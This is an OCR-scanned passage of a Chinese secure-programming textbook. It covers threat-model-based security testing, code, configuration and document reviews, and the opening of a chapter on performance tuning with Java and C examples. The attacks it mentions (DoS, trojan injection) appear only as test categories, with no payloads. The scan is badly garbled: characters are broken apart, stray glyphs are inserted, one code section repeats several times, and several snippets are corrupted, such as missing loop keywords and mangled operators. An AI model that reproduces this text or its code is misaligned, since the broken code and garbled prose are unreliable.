性 能 安全 多 用 户 访问 应 用 服务 器 是 否 进行 了 优化 
对 数据 库 的 访问 是 否 实现 了 优化 
。 数据 算 改 ; 
。 非 授权 访问 ; 


。 遭受 DoS 攻击 ,等 等 。 
15.2.2 软件 安全 测试 的 过 程 
软件 的 安全 测试 ,一 般 根据 设计 阶段 的 威胁 模型 来 实施 。 


应 该 从 设计 阶段 就 开始 考虑 安全 问题 ,设计 要 尽 可 能 完善 ,可 采用 威胁 建 模 的 方法 


在 软件 设计 阶段 加 入 安全 因素 的 考量 。 威 胁 建 模 过 程 一 般 如 下 : 

。 在 项 目 组 中 成 立 一 个 小 组 ,该 小 组 中 的 人 员 是 项 目 组 中 对 安全 问题 比较 了 解 
的 人 ; 
站 在 安全 角度 ,分解 系统 的 安全 需求 ; 
确定 系统 可 能 面临 的 威胁 ,将 威胁 进行 分 类 ,可 以 画 出 威胁 树 ; 

。 选择 应 付 威 胁 或 者 缓和 威胁 的 方法 ; 

。 确定 最 终 解决 这 些 威胁 的 技术 。 

既然 在 设计 阶段 ,就 将 系统 可 能 出 现 的 一 些 安全 问题 写 在 文档 里 了 ,因此 ,安全 性 
测试 也 应 该 是 基于 这 些 内 容 。 

因此 ,软件 安全 测试 的 过 程 可 以 分 为 以 下 几 个 步骤 加 。 

1. 基于 前 面 设计 阶段 制定 的 威胁 模型 .设计 测试 计划 

该 过 程 一 般 基于 威胁 树 , 以 第 1 章 画 出 的 针对 用 户口 令 安全 问题 威胁 树 为 例 ,如 
图 15-2 所 示 。 
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获取 用 户口 令 


通过 监听 获取 从 服务 器 证 书 | | 。 从 本 地 获取 
[~ 图 感染 病毒 恶意 管理 员 
图 15-2 


测试 计划 就 可 以 基于 口令 安全 可 能 遭受 的 各 个 攻击 进行 制定 。 
2. 将 安全 测试 的 最 小 组 件 单位 进行 划分 ,并 确定 组 件 的 输入 格式 
实际 上 ,和 传统 的 测试 不 同 ,威胁 模型 中 ,并 不 是 所 有 的 模块 都 会 有 安全 问题 , 因 


”此 ,只 需 将 需要 安全 测试 的 某 一 部 分 程序 取出 来 进行 测试 ,将 安全 测试 的 最 小 组 件 单位 
， 进行 划分 。 


此 外 ,每 个 组 件 都 提供 了 接口 ,也 就 是 输入 ,在 测试 阶段 ,测试 用 例 需 要 进行 输入 ， 


这 就 必须 将 每 个 接口 的 输入 类 型 .输入 格式 等 都 列 出 来 ,便于 测试 用 例 的 制定 。 这 些 输 


入 如 : 


Socket 数据 ; 

。 无 线 数据 ; 

。 命令 行 ; 

语音 设备 ; 

*。 串口 ; 

HTTP 提交 ,等 等 。 

3. 根据 各 个 接口 可 能 遇 到 的 威胁 .或 者 系统 的 潜在 漏洞 ,对 接口 进行 分 级 

在 该 步骤 中 ,主要 是 确定 系统 将 要 受到 的 威胁 的 严重 性 ,将 比较 严重 的 威胁 进行 优 
先 的 测试 ,这 个 严重 性 的 判断 ,应 该 来 源 于 威胁 模型 。 

可 以 通过 很 多 方法 对 接口 受到 的 威胁 性 进行 分 级 ,文献 [2] 中 推荐 了 一 种 积分 制 方 
法 ,对 各 个 接口 可 能 受到 的 各 种 威胁 进行 积分 .最 后 累加 ,优先 测试 那些 分 数 排 在 前 面 
的 接口 。 

4. 确定 输入 数据 ,设计 测试 用 例 

每 一 个 接口 可 以 输入 的 数据 都 不 相同 ,由 于 安全 测试 不 同 于 普通 的 测试 ,因此 还 要 
更 加 精心 地 设计 测试 用 例 。 有 了 时候 还 要 精心 设计 输入 的 数据 结构 ,如 随机 数 、 集 合 等 的 
设计 ,都 必须 是 为 安全 测试 服务 的 。 

在 测试 用 例 的 设计 过 程 中 ,必须 了 解 , 安 全 测试 实际 上 是 对 程序 进行 的 安全 攻击 ， 
因此 ,不 但 数据 本 身 需要 精心 设计 ,测试 手段 也 要 精心 设计 。 如 在 对 缓冲 区 溢出 的 测试 
中 ,必须 精心 设计 各 种 输入 ,从 不 同 的 方面 来 对 程序 进行 攻击 。 

如 上 面 Web 网 站 中 可 以 设计 的 测试 用 例 可 以 如 表 15-2 所 示 ( 这 里 省 去 具体 的 输 
入 , 仅 列 出 测试 的 手段 ) 。 
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表 15-2 Web 网 站 需要 进行 的 测试 


测试 内 容 手段 
用 户 权限 划分 各 种 权限 用 户 登录 并 操作 

用 户 密码 猜测 密码 ,查看 数据 库 密码 保存 估 站 

系统 可 否 有 后 门 登录 尝试 各 种 登录 方法 | 人 
session 检查 不 登录 进行 操作 
DoS 攻击 反复 进行 DoS 攻击 | 

木马 注入 注入 木马 | 

防火 墙 和 杀毒 软件 注入 病毒 

系统 数据 可 备份 和 恢复 能 力 数据 破坏 

保证 每 周 7 天 ,每 天 24 小 时 连续 工作 持续 运行 足够 时 间 


5. 攻击 应 用 程序 ,查看 其 效果 

用 设计 的 测试 用 例 来 攻击 应 用 程序 ,使 得 系统 处 于 一 种 受到 威胁 的 状态 ,来 得 到 
输出 。 

6. 总 结 测 试 结果 ,提出 解决 方案 

本 过 程 中 ,将 预期 输出 和 实际 输出 进行 比较 ,得 出 结论 , 写 出 测试 报告 ,最 后 提交 相 
应 的 人 员 ,进行 错误 解决 。 

以 上 是 测试 的 过 程 ,近年 来 ,关于 安全 性 测试 ,还 研究 出 了 一 些 成 果 , 借 计算 机 来 进 
行 自动 的 测试 ,这 些 成 果 主 要 包括 以 下 几 种 。 

1) 用 形式 化 方法 进行 安全 测试 

该 方法 用 状态 迁移 系统 描述 软件 的 行为 ,将 软件 的 功能 用 计算 逻辑 和 逻辑 演算 来 
表达 ,通过 逮 辑 上 的 推理 和 搜索 ,来 发 现 软件 中 的 漏洞 。 

2) 基于 模型 的 安全 功能 测试 

在 该 方法 中 ,首先 对 软件 的 结构 和 功能 进行 建 模 ,生成 测试 模型 ,然后 利用 测试 模 
型 导出 测试 用 例 。 该 方法 的 成 功 与 否 , 取 决 于 建 模 的 准确 性 ,对 身份 认证 ,访问 控制 等 
情况 下 安全 测试 比较 适用 。 常 用 模型 有 : 

。 UML 模型 ; 

。 马尔 可 夫 链 模型 ,等 等 。 

3) 基于 输入 语法 进行 测试 

接口 的 输入 语法 ,定义 了 软件 接受 的 输入 数据 的 类 型 .格式 等 。 该 类 方法 中 ,首先 
提取 被 测 接 口 的 输入 语法 ,如 命令 行文 件 、 环 境 变 量 、 套 接 字 , 然 后 根据 这 些 语法 ,生成 
测试 用 例 。 此 类 测试 方法 比较 适用 于 被 测 软件 有 较 明 确 的 接口 语法 的 情况 ,范围 较 窄 。 

4) 采用 随机 方法 进行 测试 

该 方法 又 称 为 模糊 测试 ,将 随机 的 不 合法 数据 输入 到 程序 中 ,有 了 时候 能 够 发 现 一 些 
意 想不到 的 错误 ,在 安全 性 测试 中 越 来 越 受到 重视 。 | 

软件 测试 本 来 是 软件 工程 中 研究 比较 活跃 的 一 个 分 支 ,针对 安全 测试 的 研究 也 收 
到 较 多 学 者 的 重视 。 有 关 一 些 安全 测试 方面 的 最 新 进展 ,读者 可 以 参考 相关 文献 。 比 ， 
较 热 门 的 方向 包括 : \ 
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。 权限 系统 的 自动 测试 ; 

形式 化 方法 对 测试 用 例 的 表达 ; 
分 布 式 环境 下 的 测试 ; 

云 计算 环境 下 的 测试 ,等 等 。 


15.3 安全 审查 


安全 审查 是 指 对 软件 产品 进行 安全 方面 的 人 工 检查 ,是 软件 质量 保证 的 一 个 重要 


。 环节 ,主要 包括 ， 


， 行 讨论 ; 


方案 的 ; 


。 代码 的 安全 审查 ; 

。 配置 复查 ; 

。 文档 的 安全 审查 ,等 等 。 

本 节 针 对 这 几 个 问题 进行 讲解 。 
15.3.1 代码 的 安全 审查 


代码 的 审查 ,是 审查 小 组 人 工 测试 源 程序 的 过 程 ,而 代码 的 安全 审查 , 则 是 针对 威 


胁 模型 中 表达 的 一 些 安全 问题 进行 的 审查 。 


代码 的 安全 审查 ,是 一 种 非常 有 效 的 程序 安全 验证 技术 ,在 代码 的 安全 审查 过 程 
中 ,首先 要 组 建 一 个 代码 的 安全 审查 小 组 ,最 好 由 如 下 人 员 组 成 : 

。 组 长 ,应 该 是 一 个 很 有 能 力 的 程序 员 ; 

。 程序 的 设计 成 员 ; 

， 程 序 的 编写 成 员 ; 

”程序 的 测试 成 员 。 

代码 安全 审查 的 步骤 如 下 : 

(1) 小 组 成 员 先 研究 设计 说 明 书 ,力求 理解 软件 的 设计 ,然后 重点 针对 威胁 模型 进 


(2) 由 设计 者 介绍 威胁 模型 中 的 一 些 细节 ; 
(3) 程序 的 编写 者 逐个 模块 地 解释 是 怎样 用 程序 代码 解决 威胁 模型 中 提出 的 解决 


(4) 对 照 安 全 程序 设计 常见 错误 ,分 析 审 查 程序 ; 
(5) 发 现 错误 时 ,记录 错误 ,继续 审查 。 
15.3.2 配置 复查 
软件 配置 ,实际 上 是 指 软件 需求 规格 说 明 、 软 件 设计 规格 说 明 、 源 代码 等 的 总 称 , 配 


置 复查 实际 上 是 软件 验收 测试 的 重要 内 容 。 


配置 复查 的 目的 ,需要 保证 如 下 内 容 : 
。 软件 配置 的 所 有 成 分 都 齐全 ; 
。 软件 配置 质量 符合 要 求 ; 
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。 文档 与 程序 完全 一 致 ; 

。 具有 完成 软件 维护 所 必须 准备 的 细节 ; 

。 使 用 手册 的 完整 性 和 正确 性 ,等 等 。 

软件 配置 复查 的 过 程 中 ,必须 仔细 记录 发 现 软件 安全 测试 过 程 中 的 安全 遗漏 或 错 
误 , 并 且 适 当地 补充 和 改正 。 | 


15.3.3 文档 的 安全 审查 


文档 在 软件 工程 中 非常 重要 。 对 于 用 户 来 说 ,软件 事实 上 就 是 文档 ,因此 ,文档 是 ， 
影响 软件 质量 的 决定 因素 ,有 时 候 可 以 说 ,文档 比 程序 代码 更 重要 。 在 文档 中 ,关于 安 
全 问题 的 描述 不 能 忽视 ,必须 进行 审查 。 

软件 系统 的 文档 可 分 为 以 下 两 类 。 

1. 用 户 文 档 

用 户 文档 主要 描述 系统 功能 和 使 用 方法 ,而 并 不 关心 这 些 功 能 是 怎样 实现 的 。 用 
户 文档 是 用 户 了 解 系统 的 第 一 步 , 它 应 该 能 使 用 户 获得 对 系统 的 准确 的 初步 印象 。 用 
户 文档 至 少 应 该 包括 下 述 5 方面 的 内 容 : 

(1) 功能 描述 ,说 明 系 统 的 功能 。 

(2) 安装 文档 ,说 明 怎 样 安装 这 个 系统 ,怎样 对 系统 进行 配置 ,使 其 适应 特定 的 
行 环境 。 

(3) 使 用 手册 ,说 明 如 何 使 用 这 个 系统 ,这 是 一 个 比较 重要 的 文档 ,用 户 应 该 可 以 
通过 这 个 文档 学 会 系统 的 使 用 ,有 时 候 ,需要 通过 丰富 例子 ,图文并茂 地 表达 这 些 问题 。 

(4) 参考 手册 ,详尽 描述 软件 中 提供 给 用 户 使 用 的 所 有 系统 设施 及 其 使 用 方法 , 另 
外 ,参考 手册 中 还 应 该 解释 系统 可 能 产生 的 各 种 输出 信息 ,如 出 错 信息 的 含义 。 

(5) 如 果 系 统 中 有 操作 员 的 话 , 还 需要 提供 操作 员 指 南 ,指示 操作 员 应 该 如 何 处 理 
使 用 过 程 中 出 现 的 一 些 情况 。 

用 户 文档 可 以 分 别 设立 独立 的 文档 ,也 可 以 设置 为 一 个 大 文档 的 各 个 分 册 ,具体 做 
法 ,由 系统 的 复杂 性 决定 。 

2. 系统 文档 

系统 文档 指 从 问题 可 行 性 分 析 、 问 题 定义 .需求 分 析 、 系 统 总 体 设计 、 详 细 设计 到 测 
试 和 测试 报告 这 样 一 系列 工作 有 关 的 文档 。 系 统 文档 描述 了 系统 从 设计 到 实现 ,最 后 
到 测试 的 过 程 。 该 部 分 的 文档 包括 : 

。 可 行 性 研究 报告 ; 

。 需求 分 析 说 明 书 ; 

。 总 体 设计 说 明 书 ; 

。 详细 设计 说 明 书 ; 

。 测试 计划 ; 

。 测试 报告 ,等 等 。 

文档 的 安全 审查 ,是 针对 软件 项 目 中 的 安全 问题 进行 的 审查 ,此 过 程 中 , 主要 进行 
的 工作 是 ,根据 威胁 模型 ,在 各 个 文档 中 审查 是 否 进行 了 良好 的 表达 。 如 : 
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。 用 户 文档 中 是 否 含有 和 解决 安全 问题 相关 的 措施 , 米 提示 用 户 的 操作 尽 可 能 保 
证 安全 性 ; 

。 系统 文档 中 是 否 将 所 有 的 安全 问题 进行 了 解决 ,并 用 明晰 的 表达 方式 描述 出 
来 ,等 等。 


小 结 


本 章 讲解 了 安全 编程 测试 中 的 几 个 关键 问题 ,首先 讲解 了 软件 测试 的 概念 、 目 的 、 
意义 和 方法 ,然后 阐述 了 针对 安全 问题 的 软件 测试 ,并 对 这 些 测试 方法 进行 了 一 些 
分 类 。 


练 习 


1. 有 一 个 银行 系统 ,需要 进行 常见 的 用 户 转 账 .查询 操作 。 流 程 如 图 15-3 所 示 。 

(1) 列 出 银行 系统 中 应 该 进行 的 和 安全 有 关 的 测试 。 

(2) 画 出 威胁 树 。 

2. 软件 安全 测试 是 针对 安全 问题 的 测试 。 | 到 这 操 作 中 而 | 

(1) 软件 安全 测试 和 传统 普通 测试 的 区 别 有 哪 些 ? i 

(2) 软件 安全 测试 的 方法 有 哪些 ? 

3. 在 某 个 论坛 中 ,可 能 在 各 种 情况 下 出 现 服务 器 负载 过 
大 不 得 不 停机 的 问题 。 a 453 

(1) 造成 这 个 问题 的 原因 可 能 有 哪些 ? 

(2) 画 出 威胁 树 。 

(3) 怎样 解决 或 者 缓解 这 个 问题 ? 

(4) 怎样 测试 ? 

4. Socket 是 一 种 使 用 较 多 的 网 络 通信 手段 。 

(1) 通过 查阅 相关 资料 来 了 解 : 如 果 要 进行 即时 通信 ,怎样 用 Socket 实现 ? 

(2) Socket 通信 过 程 中 具有 什么 安全 问题 ? Socket 安全 测试 一 般 怎样 进行 ? 


用 户 输入 账号 口令 


一 查询 转账 | 一 
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程序 性 能 调 优 


安全 编程 技术 ,其 本 质 是 要 编写 安全 的 程序 。 但 是 ,实际 上 ,安全 是 一 个 广泛 的 概 
念 ,除了 在 功能 上 需要 能 够 不 出 现 隐患 外 ,在 性 能 上 也 需要 能 够 不 为 隐患 提供 出 现 的 可 
能 。 特 别 是 在 某 些 情况 下 ,性 能 调 优 显得 格外 重要 。 如 果 程 序 性 能 不 好 ,也 可 能 导致 某 
些 方面 的 安全 问题 。 因 此 ,性 能 调 优 是 保证 程序 安全 的 一 个 重要 方面 。 

本 章 基 于 一 些 流行 的 编程 语言 ,讲解 一 些 性 能 调 优 方面 的 编程 技巧 。 性 能 调 优 方 
面 的 讲解 包括 以 下 几 个 方面 : 

。 数据 优化 。 主 要 是 编程 过 程 中 数据 使 用 上 的 调 优 , 如 变量 赋值 .字符 串 、 数 据 结 

构 优 化 等 。 
。 算法 优化 。 主 要 是 对 运算 过 程 进 行 优 化 ,如 基本 算术 运算 .运算 流程 上 的 优 
化 等 。 

。 应 用 优化 。 针 对 异常 处 理 . 单 态 对 象 、 享 元 对 象 \Web 程序 、 线 程 操作 进行 优化 。 

。 大 量 的 软件 中 都 用 到 了 数据 库 , 数 据 库 的 访问 速度 直接 影响 到 程序 的 运行 性 能 

安全 性 ,本 章 也 对 数据 库 访问 过 程 中 的 优化 问题 进行 了 讲解 。 

应 该 指出 的 是 ,本 章 内 容 只 是 一 些 技巧 的 举例 ,并 不 能 代表 所 有 的 代码 优化 技术 。 
本 章 的 目的 是 为 了 让 读者 知道 代码 优化 的 重要 性 以 及 掌握 一 些 常见 的 技巧 。 

不 过 ,代码 的 优化 有 时 候 是 以 程序 的 可 读 性 甚至 程序 安全 性 为 代价 的 ,在 开发 的 过 
程 中 ,一 定 要 权衡 好 两 者 之 间 的 利 羔 关 系 , 采 用 适当 的 优化 方法 。 


16.1 数据 优化 


16.1.1 优化 变量 赋值 


一 般 说 来 ,由 于 局 部 变量 用 完 之 后 释放 ,因此 有 些 作 用 范围 较 大 的 变量 操作 , 改 为 
局 部 变量 来 实现 ,有 助 于 节省 宝贵 的 系统 资源 。 
如 下 代码 : 


鸭 件 安全 实现 一 安全 编程 技术 


“| 5 


class Test 
| { 
| int sum; 
优 7| | void cal() 
0 
(int i = 1; i < 1000; i++) 
| Sum += i; 
} 
} 
. 


| 该 代码 是 求 1 一 1000 的 和 ,变量 sum 作为 类 成 员 变量 ,在 循环 中 对 其 进行 反复 读 
” 取 , 由 于 对 局 部 变量 进行 读 取 ,消耗 资源 较 少 ,因此 ,可 以 将 这 个 读 取 过 程 交 给 局 部 变量 
去 做 ,代码 如 下 : 


class Test 
{ 
int sum; 
void cal() 
{ 
int temp = sum; 
for (int i = 1; i < 1000; i++) 
{ 
temp 十 = i; 
} 
sum = temp; 
} 
} 


该 代码 中 ,对 sum 的 读 取 和 赋值 变 为 了 对 局 部 变量 temp 的 访问 。 
提示 后面 的 代码 在 可 读 性 上 不 如 前 面 的 代码 ,所 以 在 采用 时 应 该 权衡 考虑 。 


”16.1.2 优化 字符 串 


由 于 字符 串 的 特殊 性 和 灵活 性 ,字符 串 的 优化 应 用 较 广 。 
首先 ,由 于 字符 串 的 池 机 制 ,字符 串 的 初始 化 (分 配 内 存 过 程 ) 就 可 以 优化 。 
看 如 下 代码 : 


String str = new String( "China”" ); 


| 该 代码 中 ,系统 实例 化 一 个 新 的 对 象 str, 为 其 分 配 内 存 空间 。 但 是 由 于 字符 串 使 
”用 了 池 机 制 ,可 以 将 上 面 的 代码 优化 如 下 : 


String str = "China"; 
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此 代码 中 ,系统 首先 检查 池 中 有 无 “China”, 如 果 有 ,系统 将 直接 使 用 池 中 的 字符 
串 ,而 不 用 新 分 配 内 存 空间 。 


提示 “字符 串 的 池 机 制 是 指 : 当 字 符 串 初始 化 时 ,首先 在 池 ( 内 存 的 一 片 空 间 ) 中 


查找 ,是 否 存在 该 字符 串 , 如 池 中 有 该 字符 串 ,就 使 用 池 中 的 ; 如 果 没 有 ,系统 为 字符 串 
分 配 新 的 空间 ,并 放 入 池 中 。 


一 般 情 况 下 ,由 于 字符 串 常量 的 出 现 都 会 附带 为 其 分 配 内 存 空 间 ,因此 ,能 够 避免 ， 
字符 串 常 量 出 现 的 场合 ,可 以 尽量 避免 。 | 
如 下 代码 ; 


String s; 
if( s.equals("") ) 
{ 

// 一 些 操 作 
} 


该 代码 将 字符 串 s 和 空 字 符 串 相 比 较 , 虽 然 空 字符 串 中 没有 内 容 , 但 是 也 要 占用 字 
符 串 所 规定 的 内 存 空 间 。 因 此 ,可 以 用 如 下 代码 加 以 避免 : 


String s; 
if( s.length() == 0) 
{ 
// 一 些 操作 
} 


又 如 ,如 下 代码 : 


StringBuffer sb; 
String str = ","; 
for (int i = 0; i < 10; ++i) 
{ 
sb. append( i); 
sb. append( str); 
} 


该 代码 中 ,字符 串 str 中 只 包含 一 个 逗号 ,如 果 用 字符 串 的 形式 来 保存 , 比 用 字符 
形式 保存 消耗 的 资源 要 多 。 因 此 ,该 代码 可 以 作 如 下 优化 : 


StringBuffer sb; 
for (int i = 0; i < 10; ++i) 
{ 
sb. append( i); 
sb. append( ', '); 
} 


将 逗号 用 字符 来 表示 ,节省 系统 资源 。 


第 16 章 程序 性能 调 优 


Cm | 
本 >” 


此 代码 中 ,系统 首先 检查 池 中 有 无 “China”, 如 果 有 ,系统 将 直接 使 用 池 中 的 字符 
串 ,而 不 用 新 分 配 内 存 空间 。 


提示 “字符 串 的 池 机 制 是 指 : 当 字 符 串 初始 化 时 ,首先 在 池 ( 内 存 的 一 片 空 间 ) 中 


查找 ,是 否 存在 该 字符 串 , 如 池 中 有 该 字符 串 ,就 使 用 池 中 的 ; 如 果 没 有 ,系统 为 字符 串 
分 配 新 的 空间 ,并 放 入 池 中 。 


一 般 情 况 下 ,由 于 字符 串 常量 的 出 现 都 会 附带 为 其 分 配 内 存 空 间 ,因此 ,能 够 避免 ， 
字符 串 常 量 出 现 的 场合 ,可 以 尽量 避免 。 | 
如 下 代码 ; 


String s; 
if( s.equals("") ) 
{ 

// 一 些 操 作 
} 


该 代码 将 字符 串 s 和 空 字 符 串 相 比 较 , 虽 然 空 字符 串 中 没有 内 容 , 但 是 也 要 占用 字 
符 串 所 规定 的 内 存 空 间 。 因 此 ,可 以 用 如 下 代码 加 以 避免 : 


String s; 
if( s.length() == 0) 
{ 
// 一 些 操作 
} 


又 如 ,如 下 代码 : 


StringBuffer sb; 
String str = ","; 
for (int i = 0; i < 10; ++i) 
{ 
sb. append( i); 
sb. append( str); 
} 


该 代码 中 ,字符 串 str 中 只 包含 一 个 逗号 ,如 果 用 字符 串 的 形式 来 保存 , 比 用 字符 
形式 保存 消耗 的 资源 要 多 。 因 此 ,该 代码 可 以 作 如 下 优化 : 


StringBuffer sb; 
for (int i = 0; i < 10; ++i) 
{ 
sb. append( i); 
sb. append( ', '); 
} 


将 逗号 用 字符 来 表示 ,节省 系统 资源 。 
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此 代码 中 ,系统 首先 检查 池 中 有 无 “China”, 如 果 有 ,系统 将 直接 使 用 池 中 的 字符 
串 ,而 不 用 新 分 配 内 存 空间 。 


提示 “字符 串 的 池 机 制 是 指 : 当 字 符 串 初始 化 时 ,首先 在 池 ( 内 存 的 一 片 空 间 ) 中 


查找 ,是 否 存在 该 字符 串 , 如 池 中 有 该 字符 串 ,就 使 用 池 中 的 ; 如 果 没 有 ,系统 为 字符 串 
分 配 新 的 空间 ,并 放 入 池 中 。 


一 般 情 况 下 ,由 于 字符 串 常量 的 出 现 都 会 附带 为 其 分 配 内 存 空 间 ,因此 ,能 够 避免 ， 
字符 串 常 量 出 现 的 场合 ,可 以 尽量 避免 。 | 
如 下 代码 ; 


String s; 
if( s.equals("") ) 
{ 

// 一 些 操 作 
} 


该 代码 将 字符 串 s 和 空 字 符 串 相 比 较 , 虽 然 空 字符 串 中 没有 内 容 , 但 是 也 要 占用 字 
符 串 所 规定 的 内 存 空 间 。 因 此 ,可 以 用 如 下 代码 加 以 避免 : 


String s; 
if( s.length() == 0) 
{ 
// 一 些 操作 
} 


又 如 ,如 下 代码 : 


StringBuffer sb; 
String str = ","; 
for (int i = 0; i < 10; ++i) 
{ 
sb. append( i); 
sb. append( str); 
} 


该 代码 中 ,字符 串 str 中 只 包含 一 个 逗号 ,如 果 用 字符 串 的 形式 来 保存 , 比 用 字符 
形式 保存 消耗 的 资源 要 多 。 因 此 ,该 代码 可 以 作 如 下 优化 : 


StringBuffer sb; 
for (int i = 0; i < 10; ++i) 
{ 
sb. append( i); 
sb. append( ', '); 
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将 逗号 用 字符 来 表示 ,节省 系统 资源 。 
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此 代码 中 ,系统 首先 检查 池 中 有 无 “China”, 如 果 有 ,系统 将 直接 使 用 池 中 的 字符 
串 ,而 不 用 新 分 配 内 存 空间 。 


提示 “字符 串 的 池 机 制 是 指 : 当 字 符 串 初始 化 时 ,首先 在 池 ( 内 存 的 一 片 空 间 ) 中 


查找 ,是 否 存在 该 字符 串 , 如 池 中 有 该 字符 串 ,就 使 用 池 中 的 ; 如 果 没 有 ,系统 为 字符 串 
分 配 新 的 空间 ,并 放 入 池 中 。 


一 般 情 况 下 ,由 于 字符 串 常量 的 出 现 都 会 附带 为 其 分 配 内 存 空 间 ,因此 ,能 够 避免 ， 
字符 串 常 量 出 现 的 场合 ,可 以 尽量 避免 。 | 
如 下 代码 ; 


String s; 
if( s.equals("") ) 
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// 一 些 操 作 
} 


该 代码 将 字符 串 s 和 空 字 符 串 相 比 较 , 虽 然 空 字符 串 中 没有 内 容 , 但 是 也 要 占用 字 
符 串 所 规定 的 内 存 空 间 。 因 此 ,可 以 用 如 下 代码 加 以 避免 : 


String s; 
if( s.length() == 0) 
{ 
// 一 些 操作 
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又 如 ,如 下 代码 : 


StringBuffer sb; 
String str = ","; 
for (int i = 0; i < 10; ++i) 
{ 
sb. append( i); 
sb. append( str); 
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该 代码 中 ,字符 串 str 中 只 包含 一 个 逗号 ,如 果 用 字符 串 的 形式 来 保存 , 比 用 字符 
形式 保存 消耗 的 资源 要 多 。 因 此 ,该 代码 可 以 作 如 下 优化 : 
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将 逗号 用 字符 来 表示 ,节省 系统 资源 。 
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值得 一 提 的 是 ,在 对 多 个 字符 串 进行 操作 或 对 一 个 字符 串 进行 修改 时 ,用 
StringBuffer 比 用 String 要 好 。 

如 下 代码 : 


String strl = "sl"7 
String str2 = "s2"; 
String str3 = strl + str2; 


str3 将 保存 strl 和 str2 连接 在 一 起 的 结果 ,系统 将 为 str3 额外 分 配 内 存 。 为 了 避 
免 这 个 额外 的 资源 消耗 ,代码 可 以 优化 如 下 : 


StringBuffer sb = new StringBuffer("s1"); 
String str2 = "s2"; 
sb. append( str2); 


这 样 ,就 不 需要 为 两 个 字符 串 连 接 的 结果 额外 分 配 内 存 。 当 然 ,此 时 带 来 的 代价 是 ; 前 


面 那个 字符 串 的 内 容 丢 失 了 。 
16.1.3 选择 合适 的 数据 结构 


在 实际 开发 的 过 程 中 ,选择 一 种 合适 的 数据 结构 很 重要 。 比 如 ,有 一 堆 随 机 存放 的 
数据 ,如 果 经 常 在 其 中 进行 插入 和 删除 操作 ,使 用 链表 较 好 ; 如 果 要 经 常 进行 读 取 , 并 
且 数 据 个 数 固定 , 则 使 用 数组 较 好 。 

这 里 需要 注意 的 是 ,在 高 级 语言 中 ,大 部 分 语言 中 虽然 提供 了 同样 功能 的 API, 但 
是 底层 实现 机 制 不 同 ,操作 性 能 大 不 相同 ,而 不 是 从 表面 就 可 以 看 出 来 的 。 如 Java 语 
言 中 : 

。 ArrayList 和 LinkedList, 提 供 了 功能 类 似 的 API, 如 对 元 素 的 增删 改 查 。 但 是 
前 者 采用 数组 方式 存储 数据 ,后 者 采用 链表 方式 存储 数据 ,在 数据 大 量 进行 添 
加 删除 时 效果 不 一 样 。 

ArrayList 和 Vector, 后 者 实现 了 线程 同步 ,在 没有 线程 要 求 时 适合 用 前 者 , 因 
为 速度 较 快 ; 多 个 线程 访问 同一 个 Vector 时 适合 用 后 者 ,因为 可 以 保证 数据 安 
又 如 ,在 C 中 ,数组 与 指针 语句 具有 十 分 密切 的 关系 ,一 般 来 说 ,指针 的 好 处 是 比 


较 灵活 简洁 ,而 数组 则 比较 直观 ,容易 理解 。 与 数组 索引 相 比 ,指针 一 般 能 使 代码 速度 


更 快 ,占用 空间 更 少 。 另 外 ,对 于 大 部 分 的 编译 器 ,使 用 指针 比 使 用 数组 生成 的 代码 更 


。 短 , 执 行 效率 更 高 。 这 种 情况 ,在 使 用 多 维 数组 时 差异 更 明显 。 


下 面 的 代码 作用 是 相同 的 ,但 是 效率 不 一 样 。 
数组 索引 : 


for(;;){ 
sum+= array[t ++ ]; 


} 
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指针 运算 : 


p= array; 
for(;;){ 
sum+= x (p++ ); 


} 


提示 “该 代码 的 指针 版 本 中 ,array 的 地 址 每 次 赋值 给 地 址 p 后 ,在 每 次 循环 中 
只 需 对 指针 Pp 进行 增 量 操作 。 在 数组 索引 版 本 中 ,每 次 循环 中 都 必须 进行 根据 t 值 求 
数组 下 标的 复杂 运算 。 


16.1.4 使 用 尽量 小 的 数据 类 型 


为 了 保证 空间 不 被 浪费 ,在 使 用 数据 类 型 的 过 程 中 ,可 以 做 到 : 
。 能 够 使 用 字符 型 (char) 定 义 的 变量 的 情况 下 ,就 不 要 使 用 整 型 (int) 变 量 来 存储 
数据 ; 

。 能够 使 用 整 型 (int) 变 量 定义 的 变量 就 不 要 用 长 整 型 (long int); 

。 能 使 用 浮 点 型 (float) 变 量 就 不 要 使 用 双 精度 (double) 型 变量 ,等 等 。 

提示 ”必须 要 保证 ,在 定义 变量 后 ,变量 中 的 值 不 要 超过 变量 所 能 容纳 的 范围 。 
如 果 超 过 变量 的 范围 赋值 ,有 些 语言 ,如 Java, 可 以 为 变量 超过 范围 报错 ; 但 是 ,有 些 编 
译 器 (如 C 编译 器 ), 并 不 报错 ,但 程序 运行 结果 却 错 了 ,而 且 这 样 的 错误 很 难 发 现 。 如 
前 面 章节 中 讲解 的 整数 溢出 ,就 是 一 个 发 生 错 误 的 案例 。 


16.1.5 合理 使 用 集合 


很 多 语言 中 都 有 集合 的 概念 , 某 些 集合 的 存储 实际 上 是 用 数组 ,如 java 中 的 
Vector、ArrayList, 实 际 上 就 是 一 个 java. lang. Object 实例 的 数组 。 


以 Vector 为 例 ,Vector 的 使 用 与 数组 相似 , 它 的 元 素 可 以 通过 整数 形式 的 索引 访 


问 。 但 是 ,Vector 类 型 的 对 象 在 创建 之 后 ,对 象 的 大 小 能 够 根据 元 素 的 增加 或 者 删除 
而 扩展 、 缩 小 。 

在 使 用 集合 时 , 尽 可 能 将 元 素 添 加 到 集合 后 面 。 

以 下 例子 : 


Vector v = new Vector(); 
for(int i=0;i<100; i++) 
{ 

v.add(0, "China"); 
] 


可 以 改 为 : 


Vector v = new Vector(); 
for(int i=0;i<100; i++) 
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v.add("China"); 
} 


网 用 可 以 免除 元 素 的 移动 。 同 样 的 规则 也 适用 于 Vector 类 的 remove() 方 法 。 由 于 
冉 -] ”Vector 中 各 个 元 素 之 间 不 能 含有 “空隙 ", 删 除 最 后 一 个 元 素 之 外 的 任意 其 他 元 素 都 导 
SR 致 被 出 除 元 素 之 后 的 元 素 向 前 移动 。 也 就 是 说 ,从 Vector 删除 最 后 一 个 元 素 要 比 删除 

| 第 一 个 元 素 * 开 销 " 低 好 几 倍 。 


假设 要 从 前 面 的 Vector 删除 所 有 元 素 , 可 以 使 用 这 种 代码 : 


for(int i=0;i<100; i++) 
{ 
Vv. remove( 0); 


} 


以 上 代码 性 能 不 佳 ,应 该 改 为 : 


for(int i=0;i<100; i++) 
{ 
Vv. remove(v. size()—1); 


. 


当然 ,从 Vector 类 型 的 对 象 v 删除 所 有 元 素 的 最 好 方法 是 使 用 *v. removeAllElements();” 
语句。 


16.2 算法 优化 


16.2.1 优化 基本 运算 


